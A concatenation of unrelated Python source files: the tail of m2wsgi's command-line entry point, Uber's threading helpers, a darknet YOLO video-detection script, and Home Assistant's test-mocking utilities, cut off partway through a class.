and mongrel2 (via zmq) will automatically load-balance the requests to them.
Similarly, there's no fancy arrangement of master/worker processes to support
clean reloading of the handler; you just kill the old handler process and start
up a new one. Send m2wsgi a SIGHUP and it will automatically shutdown and
reincarnate itself for a clean restart.
Current bugs, limitations and things to do
------------------------------------------
It's not all perfect just yet, although it does seem to mostly work:
* Needs tests something fierce! I just have to find the patience to
write the necessary setup and teardown cruft.
* It would be great to grab connection details straight from the
mongrel2 config database. Perhaps a Connection.from_config method
with keywords to select the connection by handler id, host, route etc.
* support for expect-100-continue; this may have to live in mongrel2
"""
# Copyright (c) 2011, Ryan Kelly.
# All rights reserved; available under the terms of the MIT License.
__ver_major__ = 0
__ver_minor__ = 5
__ver_patch__ = 2
__ver_sub__ = ""
__version__ = "%d.%d.%d%s" % (__ver_major__,__ver_minor__,__ver_patch__,__ver_sub__)
import sys
import os
import optparse
from subprocess import MAXFD
from textwrap import dedent
try:
import signal
except ImportError:
signal = None
from m2wsgi.util import load_dotted_name
def main(argv=None):
"""Entry-point for command-line use of m2wsgi."""
op = optparse.OptionParser(usage=dedent("""
usage: m2wsgi [options] dotted.app.name spend_spec [recv_spec]
"""))
op.add_option("","--io",default="standard",
help="the I/O module to use")
op.add_option("","--num-threads",type="int",default=1,
help="the number of threads to use")
op.add_option("","--conn-type",default="",
help="the type of connection to use")
op.add_option("","--middleware",action="append",
help="any middleware to apply to the wsgi app")
(opts,args) = op.parse_args(argv)
# Sanity-check the arguments.
if len(args) < 1:
raise ValueError("you must specify the WSGI application")
if opts.num_threads <= 0:
raise ValueError("--num-threads must be positive")
# Grab the connection and handler class from the IO module
conn_args = args[1:]
iomod = "%s.io.%s" % (__name__,opts.io,)
iomod = __import__(iomod,fromlist=["WSGIHandler"])
iomod.monkey_patch()
WSGIHandler = iomod.WSGIHandler
if not opts.conn_type:
Connection = iomod.Connection
else:
for nm in dir(iomod):
if nm.lower() == opts.conn_type.lower() + "connection":
Connection = getattr(iomod,nm)
break
else:
raise ValueError("unknown connection type: %s" % (opts.conn_type,))
# Now that things are monkey-patched, we can load the app
# and the threading module.
import threading
app = load_dotted_name(args[0])
assert callable(app), "the specified app is not callable"
# Apply any middleware that was specified in the args
if opts.middleware:
for mname in reversed(opts.middleware):
if "." not in mname:
mname = "m2wsgi.middleware." + mname
mcls = load_dotted_name(mname)
app = mcls(app)
# Try to clean up properly when killed.
# We turn SIGTERM into a KeyboardInterrupt exception.
# We catch SIGHUP and re-execute ourself as a simple reload mechanism.
reload_the_process = []
if signal is not None:
def on_sigterm(*args):
raise KeyboardInterrupt
signal.signal(signal.SIGTERM,on_sigterm)
def on_sighup(*args):
reload_the_process.append(True)
raise KeyboardInterrupt
signal.signal(signal.SIGHUP,on_sighup)
# Start the requested N handler threads.
# N-1 are started in background threads, then one on this thread.
handlers = []
threads = []
def run_handler():
conn = Connection(*conn_args)
handler = WSGIHandler(app,conn)
handlers.append(handler)
handler.serve()
for i in xrange(opts.num_threads - 1):
t = threading.Thread(target=run_handler)
t.start()
threads.append(t)
try:
run_handler()
except KeyboardInterrupt:
if not reload_the_process:
raise
finally:
# When the handler exits, shut down any background threads.
for h in handlers:
h.stop()
for t in threads:
t.join()
# If we're doing a clean restart, close all fds and exec ourself.
if reload_the_process:
Connection.ZMQ_CTX.term()
os.closerange(3,MAXFD)
os.execv(sys.argv[0],sys.argv)
|
threads.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import queue
import threading
def execute_function_multithreaded(fn,
args_list,
block_until_all_done=True,
max_concurrent_executions=1000):
"""
Executes fn in multiple threads each with one set of the args in the
args_list.
:param fn: function to be executed
:type fn:
:param args_list:
:type args_list: list(list)
:param block_until_all_done: if is True, function will block until all the
threads are done and will return the results of each thread's execution.
:type block_until_all_done: bool
:param max_concurrent_executions:
:type max_concurrent_executions: int
:return:
If block_until_all_done is False, returns None. If block_until_all_done is
True, function returns the dict of results.
{
index: execution result of fn with args_list[index]
}
:rtype: dict
"""
result_queue = queue.Queue()
worker_queue = queue.Queue()
for i, arg in enumerate(args_list):
arg.append(i)
worker_queue.put(arg)
def fn_execute():
while True:
try:
arg = worker_queue.get(block=False)
except queue.Empty:
return
exec_index = arg[-1]
res = fn(*arg[:-1])
result_queue.put((exec_index, res))
threads = []
number_of_threads = min(max_concurrent_executions, len(args_list))
for _ in range(number_of_threads):
thread = in_thread(target=fn_execute, daemon=not block_until_all_done)
threads.append(thread)
# Returns the results only if block_until_all_done is set.
results = None
if block_until_all_done:
# Because join() cannot be interrupted by signal, a single join()
# needs to be separated into join()s with timeout in a while loop.
have_alive_child = True
while have_alive_child:
have_alive_child = False
for t in threads:
t.join(0.1)
if t.is_alive():
have_alive_child = True
results = {}
while not result_queue.empty():
item = result_queue.get()
results[item[0]] = item[1]
if len(results) != len(args_list):
raise RuntimeError(
'Some threads for func {func} did not complete '
'successfully.'.format(func=fn.__name__))
return results
def in_thread(target, args=(), name=None, daemon=True, silent=False):
"""
Executes the given function in background.
:param target: function
:param args: function arguments
:param name: name of the thread
:param daemon: run as daemon thread, do not block until thread is doe
:param silent: swallows exceptions raised by target silently
:return background thread
"""
if not isinstance(args, tuple):
raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
.format(type(args)))
if silent:
def fn(*args):
try:
target(*args)
except:
pass
else:
fn = target
bg = threading.Thread(target=fn, args=args, name=name)
bg.daemon = daemon
bg.start()
return bg
def on_event(event, func, args=(),
stop=None, check_stop_interval_s=1.0,
daemon=True, silent=False):
"""
Executes the given function in a separate thread when event is set.
That threat can be stopped by setting the optional stop event.
The stop event is check regularly every check_interval_seconds.
Exceptions will silently be swallowed when silent is True.
:param event: event that triggers func
:type event: threading.Event
:param func: function to trigger
:param args: function arguments
:param stop: event to stop thread
:type stop: threading.Event
:param check_stop_interval_s: interval in seconds to check the stop event
:type check_stop_interval_s: float
:param daemon: event thread is a daemon thread if set to True, otherwise stop event must be given
:param silent: swallows exceptions raised by target silently
:return: thread
"""
if event is None:
raise ValueError('Event must not be None')
if not isinstance(args, tuple):
raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
.format(type(args)))
if stop is None:
if not daemon:
raise ValueError('Stop event must be given for non-daemon event thread')
def fn():
event.wait()
func(*args)
else:
def fn():
while not event.is_set() and not stop.is_set():
event.wait(timeout=check_stop_interval_s)
if not stop.is_set():
func(*args)
return in_thread(fn, daemon=daemon, silent=silent)
|
darknet_video.py | from ctypes import *
import random
import os
import cv2
import time
import darknet
import argparse
from threading import Thread, enumerate
from queue import Queue
from PIL import Image
import numpy as np
os.environ["CUDA_VISIBLE_DEVICES"] = "2"
frame_width = None
frame_width = None
def parser():
parser = argparse.ArgumentParser(description="YOLO Object Detection")
parser.add_argument("--input", type=str, default="visdrone_test.avi",
help="video source. If empty, uses webcam 0 stream")
parser.add_argument("--out_filename", type=str, default="",
help="inference video name. Not saved if empty")
parser.add_argument("--weights", default="backup/yolov4-tiny_csp_best.weights",
help="yolo weights path")
parser.add_argument("--dont_show", action='store_true',
help="windown inference display. For headless systems")
parser.add_argument("--ext_output", action='store_true',
help="display bbox coordinates of detected objects")
parser.add_argument("--config_file", default="./cfg/yolov4-tiny_csp.cfg",
help="path to config file")
parser.add_argument("--data_file", default="./data/drone.data",
help="path to data file")
parser.add_argument("--thresh", type=float, default=.4,
help="remove detections with confidence below this value")
return parser.parse_args()
def str2int(video_path):
"""
argparse returns and string althout webcam uses int (0, 1 ...)
Cast to int if needed
"""
try:
return int(video_path)
except ValueError:
return video_path
def check_arguments_errors(args):
assert 0 < args.thresh < 1, "Threshold should be a float between zero and one (non-inclusive)"
if not os.path.exists(args.config_file):
raise(ValueError("Invalid config path {}".format(os.path.abspath(args.config_file))))
if not os.path.exists(args.weights):
raise(ValueError("Invalid weight path {}".format(os.path.abspath(args.weights))))
if not os.path.exists(args.data_file):
raise(ValueError("Invalid data file path {}".format(os.path.abspath(args.data_file))))
if str2int(args.input) == str and not os.path.exists(args.input):
raise(ValueError("Invalid video path {}".format(os.path.abspath(args.input))))
def set_saved_video(input_video, output_video, size):
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
fps = int(input_video.get(cv2.CAP_PROP_FPS))
video = cv2.VideoWriter(output_video, fourcc, fps, size)
return video
def video_capture(frame_queue, darknet_image_queue):
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# print(frame.shape)
frame_resized = cv2.resize(frame_rgb, (width, height), interpolation=cv2.INTER_LINEAR)
########## edited
'''frame_resized = Image.fromarray(frame_rgb)
frame_resized.thumbnail((width, height), Image.ANTIALIAS)
frame_resize = np.asarray(frame_resized)'''
orig_frame_queue.put(frame_rgb)
frame_queue.put(frame_resized)
darknet.copy_image_from_bytes(darknet_image, frame_resized.tobytes())
darknet_image_queue.put(darknet_image)
cap.release()
def inference(darknet_image_queue, detections_queue, fps_queue):
while cap.isOpened():
darknet_image = darknet_image_queue.get()
prev_time = time.time()
detections = darknet.detect_image(network, class_names, darknet_image, thresh=args.thresh)
fps = int(1/(time.time() - prev_time))
print("FPS: {}".format(fps))
detections_queue.put(detections)
# fps_queue.put(fps)
darknet.print_detections(detections, args.ext_output)
cap.release()
def drawing(frame_queue, detections_queue, fps_queue):
random.seed(3) # deterministic bbox colors
video = set_saved_video(cap, args.out_filename, (width, height))
while cap.isOpened():
# ret, orignal_frame = cap.read()
frame_resized = frame_queue.get()
orignal_frame = orig_frame_queue.get()
detections = detections_queue.get()
# fps = fps_queue.get()
if frame_resized is not None:
# print('rfr', frame_width, frame_height)
image = darknet.draw_boxes(detections, frame_resized, orignal_frame, class_colors)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# print(image.shape)
# image = cv2.resize(image, (1056, 720))
if args.out_filename is not None:
video.write(image)
if not args.dont_show:
cv2.imshow('Inference', image)
if cv2.waitKey(1) == 27:
break
cap.release()
video.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
frame_queue = Queue()
orig_frame_queue = Queue()
darknet_image_queue = Queue(maxsize=1)
detections_queue = Queue(maxsize=1)
fps_queue = Queue(maxsize=1)
args = parser()
check_arguments_errors(args)
network, class_names, class_colors = darknet.load_network(
args.config_file,
args.data_file,
args.weights,
batch_size=1
)
# Darknet doesn't accept numpy images.
# Create one with image we reuse for each detect
width = darknet.network_width(network)
height = darknet.network_height(network)
darknet_image = darknet.make_image(width, height, 3)
input_path = str2int(args.input)
cap = cv2.VideoCapture(input_path)
frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) # float
frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) # float
Thread(target=video_capture, args=(frame_queue, darknet_image_queue)).start()
Thread(target=inference, args=(darknet_image_queue, detections_queue, fps_queue)).start()
Thread(target=drawing, args=(frame_queue, detections_queue, fps_queue)).start()
|
common.py | """Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import sys
import threading
from unittest.mock import MagicMock, Mock, patch
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(time)})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
async def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: "mock-broker"}
async def _async_fire_mqtt_message(topic, payload, qos, retain):
async_fire_mqtt_message(hass, topic, payload, qos, retain)
with patch("paho.mqtt.client.Client") as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().unsubscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
mock_client().publish.side_effect = _async_fire_mqtt_message
result = await async_setup_component(hass, mqtt.DOMAIN, {mqtt.DOMAIN: config})
assert result
await hass.async_block_till_done()
hass.data["mqtt"] = MagicMock(
spec_set=hass.data["mqtt"], wraps=hass.data["mqtt"]
)
return hass.data["mqtt"]
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
f"{self.root}.{tom}": resolve(base, tom.split("."))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict("sys.modules", to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
